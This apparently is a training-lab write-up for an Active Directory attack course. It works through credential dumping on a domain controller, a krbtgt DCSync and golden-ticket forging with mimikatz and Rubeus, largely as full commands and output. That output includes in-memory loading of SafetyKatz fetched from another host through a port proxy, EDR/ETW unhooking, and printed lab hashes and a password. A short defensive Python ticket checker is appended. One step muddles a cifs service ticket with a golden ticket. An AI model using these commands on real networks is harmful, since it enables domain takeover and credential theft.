crtp-08

Learning Object 8

Tasks

1 – Extract secrets from the domain controller of dollarcorp

2 – Using the secrets of krbtgt account, create a Golden ticket

3 – Use the Golden ticket to (once again) get domain admin privileges from a machine

Flag 16 [dcorp-dc] – NTLM hash of krbtgt 🚩

Flag 17 [dcorp-dc] – NTLM hash of domain administrator – Administrator 🚩

Solutions
1 – Extract secrets from the domain controller of dollarcorp

Continuing from the Learning Object 7 lab, we already have domain admin privileges, so let's extract all the hashes from the domain controller (the command needs to be executed from a process running with DA privileges on the student VM).

Start by opening a new cmd as administrator and launching a new process as the svcadmin user:

C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args asktgt /user:svcadmin /aes256:6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011 /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt

Authentication Id : 0 ; 86511 (00000000:000151ef)
Session           : Service from 0
User Name         : svcadmin
Domain            : dcorp
Logon Server      : DCORP-DC
Logon Time        : 1/10/2025 9:28:52 AM
SID               : S-1-5-21-719815819-3726368948-3917688648-1118

         * Username : svcadmin
         * Domain   : DOLLARCORP.MONEYCORP.LOCAL
         * Password : *ThisisBlasphemyThisisMadness!!
         * Key List :
           aes256_hmac       6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011
           aes128_hmac       8c0a8695795df6c9a85c4fb588ad6cbd
           rc4_hmac_nt       b38ff50264b74508085d82c69794a4d8
           rc4_hmac_old      b38ff50264b74508085d82c69794a4d8
           rc4_md4           b38ff50264b74508085d82c69794a4d8
           rc4_hmac_nt_exp   b38ff50264b74508085d82c69794a4d8
           rc4_hmac_old_exp  b38ff50264b74508085d82c69794a4d8

Run the commands below from the process running as DA to copy Loader.exe to dcorp-dc and use it to extract credentials:

echo F | xcopy C:\AD\Tools\Loader.exe \\dcorp-dc\C$\Users\Public\Loader.exe /Y
winrs -r:dcorp-dc cmd
netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=172.16.100.34
C:\Users\Public\Loader.exe -path http://127.0.0.1:8080/SafetyKatz.exe -args "lsadump::evasive-lsa /patch" "exit"

RID  : 000001f4 (500)
User : Administrator
LM   :
NTLM : af0686cc0ca8f04df42210c9ac980760

RID  : 000001f5 (501)
User : Guest
LM   :
NTLM :

RID  : 000001f6 (502)
User : krbtgt
LM   :
NTLM : 4e9815869d2090ccfca61c1fe0d23986

RID  : 00000459 (1113)
User : sqladmin
LM   :
NTLM : 07e8be316e3da9a042a9cb681df19bf5

RID  : 0000045a (1114)
User : websvc
LM   :
NTLM : cc098f204c5887eaa8253e7c2749156f

RID  : 0000045b (1115)
User : srvadmin
LM   :
NTLM : a98e18228819e8eec3dfa33cb68b0728

RID  : 0000045d (1117)
User : appadmin
LM   :
NTLM : d549831a955fee51a43c83efb3928fa7

RID  : 0000045e (1118)
User : svcadmin
LM   :
NTLM : b38ff50264b74508085d82c69794a4d8

RID  : 0000045f (1119)
User : testda
LM   :
NTLM : a16452f790729fa34e8f3a08f234a82c

RID  : 00000460 (1120)
User : mgmtadmin
LM   :
NTLM : 95e2cd7ff77379e34c6e46265e75d754

RID  : 00000461 (1121)
User : ciadmin
LM   :
NTLM : e08253add90dccf1a208523d02998c3d

RID  : 00000462 (1122)
User : sql1admin
LM   :
NTLM : e999ae4bd06932620a1e78d2112138c6

RID  : 00001055 (4181)
User : studentadmin
LM   :
NTLM : d1254f303421d3cdbdc4c73a5bce0201

RID  : 000042cd (17101)
User : devopsadmin
LM   :
NTLM : 63abbf0737c59a3142175b1665cd51ee

RID  : 00005079 (20601)
User : student861
LM   :
NTLM : 13c291a48547b0dedc67dc560aa02430

--snip--   

RID  : 000050cb (20683)
User : DCORP-STD863$
LM   :
NTLM : fe6a068e0679afacfd5fe4a7652d2ca3

RID  : 000050cc (20684)
User : DCORP-STD864$

NTLM : 4e9815869d2090ccfca61c1fe0d23986

To get the NTLM hash and AES keys of the krbtgt account, we can use a DCSync attack. Run the command below from the process running as Domain Admin on the student VM:

C:\Users\Public\Loader.exe -path http://127.0.0.1:8080/SafetyKatz.exe -args "lsadump::evasive-dcsync /user:dcorp\krbtgt" "exit"

C:\Users\svcadmin>C:\Users\Public\Loader.exe -path http://127.0.0.1:8080/SafetyKatz.exe -args "lsadump::evasive-dcsync /user:dcorp\krbtgt "exit"
[+] Successfully unhooked ETW!
[+++] NTDLL.DLL IS UNHOOKED!
[+++] KERNEL32.DLL IS UNHOOKED!
[+++] KERNELBASE.DLL IS UNHOOKED!
[+++] ADVAPI32.DLL IS UNHOOKED!
[+] URL/PATH : http://127.0.0.1:8080/SafetyKatz.exe Arguments : lsadump::evasive-dcsync /user:dcorp\krbtgt exit

  .#####.   mimikatz 2.2.0 (x64) #19041 Nov  5 2024 21:52:02
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/


mimikatz(commandline) # lsadump::evasive-dcsync /user:dcorp\krbtgt exit
[DC] 'dollarcorp.moneycorp.local' will be the domain
[DC] 'dcorp-dc.dollarcorp.moneycorp.local' will be the DC server
[DC] 'dcorp\krbtgt' will be the user account
[rpc] Service  : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)

Object RDN           : krbtgt

** SAM ACCOUNT **

SAM Username         : krbtgt
Account Type         : 30000000 ( USER_OBJECT )
User Account Control : 00000202 ( ACCOUNTDISABLE NORMAL_ACCOUNT )
Account expiration   :
Password last change : 11/11/2022 10:59:41 PM
Object Security ID   : S-1-5-21-719815819-3726368948-3917688648-502
Object Relative ID   : 502

Credentials:
  Hash NTLM: 4e9815869d2090ccfca61c1fe0d23986
    ntlm- 0: 4e9815869d2090ccfca61c1fe0d23986
    lm  - 0: ea03581a1268674a828bde6ab09db837

Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
    Random Value : 6d4cc4edd46d8c3d3e59250c91eac2bd

* Primary:Kerberos-Newer-Keys *
    Default Salt : DOLLARCORP.MONEYCORP.LOCALkrbtgt
    Default Iterations : 4096
    Credentials
      aes256_hmac       (4096) : 154cb6624b1d859f7080a6615adc488f09f92843879b3d914cbcb5a8c3cda848
      aes128_hmac       (4096) : e74fa5a9aa05b2c0b2d196e226d8820e
      des_cbc_md5       (4096) : 150ea2e934ab6b80

* Primary:Kerberos *
    Default Salt : DOLLARCORP.MONEYCORP.LOCALkrbtgt
    Credentials
      des_cbc_md5       : 150ea2e934ab6b80

* Packages *
    NTLM-Strong-NTOWF

* Primary:WDigest *
    01  a0e60e247b498de4cacfac3ba615af01
    --snip
    29  40b43724fa76e22b0d610d656fb49ddd


mimikatz #

2 – Using the secrets of krbtgt account, create a Golden ticket

We can create a golden ticket using the following Mimikatz command. We use PowerView's Get-DomainSID to obtain the domain SID for the /sid parameter. Note that with /target and /service:cifs the ticket mimikatz forges is a service ticket for cifs on dcorp-dc rather than a TGT (see the cifs/dcorp-dc entry in the klist output below).

It worked for me. Change the rc4 value, then try this:

C:\AD\Tools\mimikatz.exe "kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /target:dcorp-dc.dollarcorp.moneycorp.local /service:cifs /rc4:257fb099fb950e071677df6b58112a33 /ptt" "exit"


PS C:\ad\Tools> C:\AD\Tools\mimikatz.exe "kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /target:dcorp-dc.dollarcorp.moneycorp.local /service:cifs /rc4:257fb099fb950e071677df6b58112a33 /ptt" "exit"

  .#####.   mimikatz 2.2.0 (x64) #19041 Dec 23 2022 16:49:51
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /target:dcorp-dc.dollarcorp.moneycorp.local /service:cifs /rc4:257fb099fb950e071677df6b58112a33 /ptt
User      : Administrator
Domain    : dollarcorp.moneycorp.local (DOLLARCORP)
SID       : S-1-5-21-719815819-3726368948-3917688648
User Id   : 500
Groups Id : *513 512 520 518 519
ServiceKey: 257fb099fb950e071677df6b58112a33 - rc4_hmac_nt
Service   : cifs
Target    : dcorp-dc.dollarcorp.moneycorp.local
Lifetime  : 11/12/2025 5:17:22 AM ; 11/10/2035 5:17:22 AM ; 11/10/2035 5:17:22 AM
-> Ticket : ** Pass The Ticket **

 * PAC generated
 * PAC signed
 * EncTicketPart generated
 * EncTicketPart encrypted
 * KrbCred generated

Golden ticket for 'Administrator @ dollarcorp.moneycorp.local' successfully submitted for current session

mimikatz(commandline) # exit
Bye!
PS C:\ad\Tools> klist

Current LogonId is 0:0x251f9416

Cached Tickets: (5)

#0>     Client: Administrator @ dollarcorp.moneycorp.local
        Server: krbtgt/dollarcorp.moneycorp.local @ dollarcorp.moneycorp.local
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x40e00000 -> forwardable renewable initial pre_authent
        Start Time: 11/12/2025 5:10:26 (local)
        End Time:   11/12/2025 15:10:26 (local)
        Renew Time: 11/19/2025 5:10:26 (local)
        Session Key Type: AES-256-CTS-HMAC-SHA1-96
        Cache Flags: 0x1 -> PRIMARY
        Kdc Called:

#1>     Client: Administrator @ dollarcorp.moneycorp.local
        Server: krbtgt/DOLLARCORP.MONEYCORP.LOCAL @ DOLLARCORP.MONEYCORP.LOCAL
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x60a10000 -> forwardable forwarded renewable pre_authent name_canonicalize
        Start Time: 11/12/2025 5:02:24 (local)
        End Time:   11/12/2025 15:02:24 (local)
        Renew Time: 11/19/2025 5:02:24 (local)
        Session Key Type: AES-256-CTS-HMAC-SHA1-96
        Cache Flags: 0x2 -> DELEGATION
        Kdc Called: dcorp-dc.dollarcorp.moneycorp.local

#2>     Client: Administrator @ dollarcorp.moneycorp.local
        Server: krbtgt/dcorp-dc.dollarcorp.moneycorp.local @ dollarcorp.moneycorp.local
        KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
        Ticket Flags 0x40e00000 -> forwardable renewable initial pre_authent
        Start Time: 11/12/2025 5:01:09 (local)
        End Time:   11/10/2035 5:01:09 (local)
        Renew Time: 11/10/2035 5:01:09 (local)
        Session Key Type: RSADSI RC4-HMAC(NT)
        Cache Flags: 0
        Kdc Called:

#3>     Client: Administrator @ dollarcorp.moneycorp.local
        Server: cifs/dcorp-dc.dollarcorp.moneycorp.local @ dollarcorp.moneycorp.local
        KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
        Ticket Flags 0x40a00000 -> forwardable renewable pre_authent
        Start Time: 11/12/2025 5:17:22 (local)
        End Time:   11/10/2035 5:17:22 (local)
        Renew Time: 11/10/2035 5:17:22 (local)
        Session Key Type: RSADSI RC4-HMAC(NT)
        Cache Flags: 0
        Kdc Called:

#4>     Client: Administrator @ dollarcorp.moneycorp.local
        Server: HTTP/dcorp-dc @ DOLLARCORP.MONEYCORP.LOCAL
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x40a50000 -> forwardable renewable pre_authent ok_as_delegate name_canonicalize
        Start Time: 11/12/2025 5:02:24 (local)
        End Time:   11/12/2025 15:02:24 (local)
        Renew Time: 11/19/2025 5:02:24 (local)
        Session Key Type: AES-256-CTS-HMAC-SHA1-96
        Cache Flags: 0
        Kdc Called: dcorp-dc.dollarcorp.moneycorp.local
PS C:\ad\Tools> dir \\dcorp-dc.dollarcorp.moneycorp.local\c$


    Directory: \\dcorp-dc.dollarcorp.moneycorp.local\c$


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----         1/16/2025   8:48 AM                Azure ATP Sensor Setup
d-----          5/8/2021   1:20 AM                PerfLogs
d-r---         1/16/2025   8:49 AM                Program Files
d-----          5/8/2021   2:40 AM                Program Files (x86)
d-r---          4/1/2025   8:44 AM                Users
d-----          1/5/2025  11:40 PM                Windows
-a----        11/17/2024  12:19 AM          36392 Microsoft.Tri.Sensor.Deployment.Deployer.exe


PS C:\ad\Tools>


We can also create a golden ticket using the following Rubeus command:

C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args evasive-golden /aes256:{krbtgt hash} /sid:{Get-DomainSID} /ldap /user:{impersonated user} /printcmd

C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args evasive-golden /aes256:154cb6624b1d859f7080a6615adc488f09f92843879b3d914cbcb5a8c3cda848 /sid:S-1-5-21-719815819-3726368948-3917688648 /ldap /user:Administrator /printcmd

C:\AD\Tools\Loader.exe Evasive-Golden /aes256:154CB6624B1D859F7080A6615ADC488F09F92843879B3D914CBCB5A8C3CDA848 /user:Administrator /id:500 /pgid:513 /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /pwdlastset:"11/11/2022 6:34:22 AM" /minpassage:1 /logoncount:727 /netbios:dcorp /groups:544,512,520,513 /dc:DCORP-DC.dollarcorp.moneycorp.local /uac:NORMAL_ACCOUNT,DONT_EXPIRE_PASSWORD
C:\AD\Tools\Loader.exe Evasive-Golden /aes256:154CB6624B1D859F7080A6615ADC488F09F92843879B3D914CBCB5A8C3CDA848 /user:Administrator /id:500 /pgid:513 /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /pwdlastset:"11/11/2022 6:34:22 AM" /minpassage:1 /logoncount:233 /netbios:dcorp /groups:544,512,520,513 /dc:DCORP-DC.dollarcorp.moneycorp.local /uac:NORMAL_ACCOUNT,DONT_EXPIRE_PASSWORD

Now we pass the generated command to Loader as the Rubeus argument: prefix it with C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args and append /ptt at the end so the forged Golden ticket is injected into the current process:

C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args evasive-golden /aes256:154CB6624B1D859F7080A6615ADC488F09F92843879B3D914CBCB5A8C3CDA848 /user:Administrator /id:500 /pgid:513 /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /pwdlastset:"11/11/2022 6:34:22 AM" /minpassage:1 /logoncount:152 /netbios:dcorp /groups:544,512,520,513 /dc:DCORP-DC.dollarcorp.moneycorp.local /uac:NORMAL_ACCOUNT,DONT_EXPIRE_PASSWORD /ptt
c:\Users\student98>C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args Evasive-Golden /aes256:154CB6624B1D859F7080A6615ADC488F09F92843879B3D914CBCB5A8C3CDA848 /user:Administrator /id:500 /pgid:513 /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /pwdlastset:"11/11/2022 6:34:22 AM" /minpassage:1 /logoncount:233 /netbios:dcorp /groups:544,512,520,513 /dc:DCORP-DC.dollarcorp.moneycorp.local /uac:NORMAL_ACCOUNT,DONT_EXPIRE_PASSWORD /ptt
[+] Successfully unhooked ETW!
[+++] NTDLL.DLL IS UNHOOKED!
[+++] KERNEL32.DLL IS UNHOOKED!
[+++] KERNELBASE.DLL IS UNHOOKED!
[+++] ADVAPI32.DLL IS UNHOOKED!
[+] URL/PATH : C:\AD\Tools\Rubeus.exe Arguments : Evasive-Golden /aes256:154CB6624B1D859F7080A6615ADC488F09F92843879B3D914CBCB5A8C3CDA848 /user:Administrator /id:500 /pgid:513 /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /pwdlastset:11/11/2022 6:34:22 AM /minpassage:1 /logoncount:233 /netbios:dcorp /groups:544,512,520,513 /dc:DCORP-DC.dollarcorp.moneycorp.local /uac:NORMAL_ACCOUNT,DONT_EXPIRE_PASSWORD /ptt
[*] Action: Build TGT

[*] Building PAC

[*] Domain         : DOLLARCORP.MONEYCORP.LOCAL (dcorp)
[*] SID            : S-1-5-21-719815819-3726368948-3917688648
[*] UserId         : 500
[*] Groups         : 544,512,520,513
[*] ServiceKey     : 154CB6624B1D859F7080A6615ADC488F09F92843879B3D914CBCB5A8C3CDA848
[*] ServiceKeyType : KERB_CHECKSUM_HMAC_SHA1_96_AES256
[*] KDCKey         : 154CB6624B1D859F7080A6615ADC488F09F92843879B3D914CBCB5A8C3CDA848
[*] KDCKeyType     : KERB_CHECKSUM_HMAC_SHA1_96_AES256
[*] Service        : krbtgt
[*] Target         : dollarcorp.moneycorp.local

[*] Generating EncTicketPart
[*] Signing PAC
[*] Encrypting EncTicketPart
[*] Generating Ticket
[*] Generated KERB-CRED
[*] Forged a TGT for 'Administrator@dollarcorp.moneycorp.local'

[*] AuthTime       : 10/22/2025 2:00:00 AM
[*] StartTime      : 10/22/2025 2:00:00 AM
[*] EndTime        : 10/22/2025 12:00:00 PM
[*] RenewTill      : 10/29/2025 2:00:00 AM

[*] base64(ticket.kirbi):

      doIGJDCCBiCgAwIBBaEDAgEWooIE3jCCBNphggTWMIIE0qADAgEFoRwbGkRPTExBUkNPUlAuTU9ORVlD
      T1JQLkxPQ0FMoi8wLaADAgECoSYwJBsGa3JidGd0Gxpkb2xsYXJjb3JwLm1vbmV5Y29ycC5sb2NhbKOC
      BHowggR2oAMCARKhAwIBA6KCBGgEggRkrnDfcO2kAVyyNS1MIdCkvmCbUvQQUNUp8rkVjIiNLwjszHre
      IM90jbfnSBTYWyYnyCDfAiEoplvLQVEekYo80zKcglAjzpioRwee/Qo7RQV0mH9Xs3+MovvBfAM4XhjX
      GJQpCar3dX5s1nOZT2AMWrNnMAjshS+zCxaoUqf8C9AFTQkg/95z6dKdtJ51/A/0BH5UK830swLnzJ0O
      /EEWjVgY2FAbtLXAF0DGdpugKlAdmJVZomf8FcZJF0P+nr08xVKp/LczG9Kz7nRIlrms+iZpnAOSWAnj
      WBFVKa7gcRkjGRd3/lQ8gZnQeAav1r8exujpkUL86HxhjjreIDhwR09P5NVQGMTteUdzJy4Yljvjb0kz
      crN36WIDdJNx/Rq3VJOlg3iHgJwTQlSpu3DFJWOLlW3Y5U2MYvcCy1IhsbkTrxHkEfnsfhvKbWJkitbl
      vO87Op1ClcHwodP/PkPBtnBaV3v9CoPVZJhgFsGdMdSHgoVmO9gUNtfElq7Zre9A7881QST1CDzDt9Ja
      VBBsCamYkkP2mjDkty9KJYzHbry4n8EGjl+MRwu76sJqDfZApMx1cg/h6X1YTBUJ6+4zWc/lhJbDQ2ji
      qN9/zI7BuNpBMavugje09Fm6WcXZOiBajOlKbIXAVKk6V5HO3BQ8cXRd/32SZ7odwii4ErV/rpgViegx
      oJisfhw6c9Fc+bExBKaSOOgJSr3gZ5aZ27Qg88OaaVtO8Xg5zotE3N6lp4inE6fMgRATed3qmVTozQO9
      nfuoEr96J1h+ziiCb2ALT5xpwhhWZB+TP3pGUfmXwQiHxa0TGTcfnJLDLBBh9UKTxpwfvQ2fSmKXZp9m
      V00OzH6RMYt+NgHwpkYHeifIbEX+svmT/2S0oRrTxaDaPWWoWVST8klA8DH6VZVeV5sh8FBuV5pUumhO
      XFWBpmV1yvJbY4V9h1KpPRTlOR+5o8MVy9q9wnpW41uKijj2xW48IB77pgdnopw1p76ry8QvHBWJCDjZ
      rTke9RLYSTCpv7RI28Afx/wCoxBT3IWPVH673UuHGhkP2ILOip6vIMeROLsJR5PuhsQr4eA5ViWorHB+
      sJ5NP59YkxacnpDBikPJD9I1XN1WoXTO/D6gYuMEMtAerfH57yTyX8FHYXMGvXqW0dDLHClIJW0kNtp6
      Zcpt+ZchAg8upKc+b2l21rr4sx0+PZgnfiIwsxOg7dLbuPbOIybLyRX25YkH4ex5QrMwNsWRPCFf6TJy
      CMKUfZy1VQNG+PdHxPO1lKGWLWHM6dEZPQnK/dWQCLcNlimBb8nRQjLrtf0Q7OH+5483J0oxv07bW3O0
      2Z/vS/Z9vPzL4cH28Kw3HxfX9LICPSc/HSrNxl43Tc0ZkaSU0LU/9xASYVKd8JyDP4WxH3ELNLGTi+iw
      s25wvMe2NW1Uns+dl9AGGgA8iZpCzVIUKyFD7VC366WvTnyl3lIlMZRhbNXKiG5DB7IQb9te5luhX9+o
      VIMg9WBrop+jggEwMIIBLKADAgEAooIBIwSCAR99ggEbMIIBF6CCARMwggEPMIIBC6ArMCmgAwIBEqEi
      BCBOcM0W2jbvGGAcD1A/DWZWIlJu0dJ20vnnP1GKwH3lcKEcGxpET0xMQVJDT1JQLk1PTkVZQ09SUC5M
      T0NBTKIaMBigAwIBAaERMA8bDUFkbWluaXN0cmF0b3KjBwMFAEDgAACkERgPMjAyNTEwMjIwOTAwMDBa
      pREYDzIwMjUxMDIyMDkwMDAwWqYRGA8yMDI1MTAyMjE5MDAwMFqnERgPMjAyNTEwMjkwOTAwMDBaqBwb
      GkRPTExBUkNPUlAuTU9ORVlDT1JQLkxPQ0FMqS8wLaADAgECoSYwJBsGa3JidGd0Gxpkb2xsYXJjb3Jw
      Lm1vbmV5Y29ycC5sb2NhbA==


[+] Ticket successfully imported!


c:\Users\student98>klist

Current LogonId is 0:0x13e40310

Cached Tickets: (1)

#0>     Client: Administrator @ DOLLARCORP.MONEYCORP.LOCAL
        Server: krbtgt/dollarcorp.moneycorp.local @ DOLLARCORP.MONEYCORP.LOCAL
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x40e00000 -> forwardable renewable initial pre_authent
        Start Time: 10/22/2025 2:00:00 (local)
        End Time:   10/22/2025 12:00:00 (local)
        Renew Time: 10/29/2025 2:00:00 (local)
        Session Key Type: AES-256-CTS-HMAC-SHA1-96
        Cache Flags: 0x1 -> PRIMARY
        Kdc Called:

c:\Users\student98>
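As an added defender-side example (not part of the lab notes), the script below parses `klist` output like the listings above and flags cached tickets whose lifetime or renewal period exceeds the domain's Kerberos policy, or which use RC4 while the domain issues AES-256. The 10-hour and 7-day thresholds are the AD defaults and are assumed here; the sample entries are copied from the two klist listings above, trimmed to the fields the parser reads.

```python
import re
from datetime import datetime, timedelta

# Policy thresholds: AD default maximum TGT lifetime (10h) and renewal age (7 days); assumed.
MAX_TICKET_LIFETIME = timedelta(hours=10)
MAX_RENEW_AGE = timedelta(days=7)
KLIST_TIME = "%m/%d/%Y %H:%M:%S"
FIELDS = ("Server", "KerbTicket Encryption Type", "Start Time", "End Time", "Renew Time")

# Sample input: three entries copied from the klist listings above (mimikatz TGT,
# mimikatz cifs ticket, Rubeus-forged TGT), trimmed to the fields the parser reads.
SAMPLE_KLIST = """\
#0>     Server: krbtgt/dollarcorp.moneycorp.local @ dollarcorp.moneycorp.local
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Start Time: 11/12/2025 5:10:26 (local)
        End Time:   11/12/2025 15:10:26 (local)
        Renew Time: 11/19/2025 5:10:26 (local)

#1>     Server: cifs/dcorp-dc.dollarcorp.moneycorp.local @ dollarcorp.moneycorp.local
        KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
        Start Time: 11/12/2025 5:17:22 (local)
        End Time:   11/10/2035 5:17:22 (local)
        Renew Time: 11/10/2035 5:17:22 (local)

#2>     Server: krbtgt/dollarcorp.moneycorp.local @ DOLLARCORP.MONEYCORP.LOCAL
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Start Time: 10/22/2025 2:00:00 (local)
        End Time:   10/22/2025 12:00:00 (local)
        Renew Time: 10/29/2025 2:00:00 (local)
"""

def parse_klist(text):
    """Split klist output into one dict of fields per '#n>' ticket block."""
    tickets = []
    for block in re.split(r"^#\d+>\s*", text, flags=re.M)[1:]:
        fields = {}
        for line in block.splitlines():
            line = line.strip()
            for key in FIELDS:
                if line.startswith(key + ":"):
                    fields[key] = line[len(key) + 1:].replace("(local)", "").strip()
        tickets.append(fields)
    return tickets

def assess(ticket):
    """Return the reasons a cached ticket looks forged (empty list if none)."""
    start, end, renew = (datetime.strptime(ticket[k], KLIST_TIME)
                         for k in ("Start Time", "End Time", "Renew Time"))
    reasons = []
    if end - start > MAX_TICKET_LIFETIME:
        reasons.append(f"lifetime {end - start} exceeds the policy maximum")
    if renew - start > MAX_RENEW_AGE:
        reasons.append(f"renewable for {renew - start}, beyond the policy maximum")
    if "RC4" in ticket["KerbTicket Encryption Type"]:
        reasons.append("RC4-encrypted ticket while the domain issues AES-256")
    return reasons

def suspicious_tickets(text):
    # Map each flagged ticket's server principal to its list of reasons.
    return {t["Server"]: assess(t) for t in parse_klist(text) if assess(t)}
```

Only the mimikatz cifs ticket is flagged; the Rubeus-forged TGT with its default 10-hour lifetime and AES-256 key passes every check here, which is why lifetime and encryption-type checks alone are not sufficient.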

3 – Use the Golden ticket to (once again) get domain admin privileges from a machine

After importing the golden ticket, we can access dcorp-dc and check our privileges:

winrs -r:dcorp-dc cmd
set username
set computername

Flag 16 [dcorp-dc] – NTLM hash of krbtgt 🚩

NTLM : 4e9815869dXXXXXXXXXXXXXXXXXXXX

Flag 17 [dcorp-dc] – NTLM hash of domain administrator – Administrator 🚩

NTLM : af0686XXXXXXXXXXXXXXXXXXXXXXXXXXX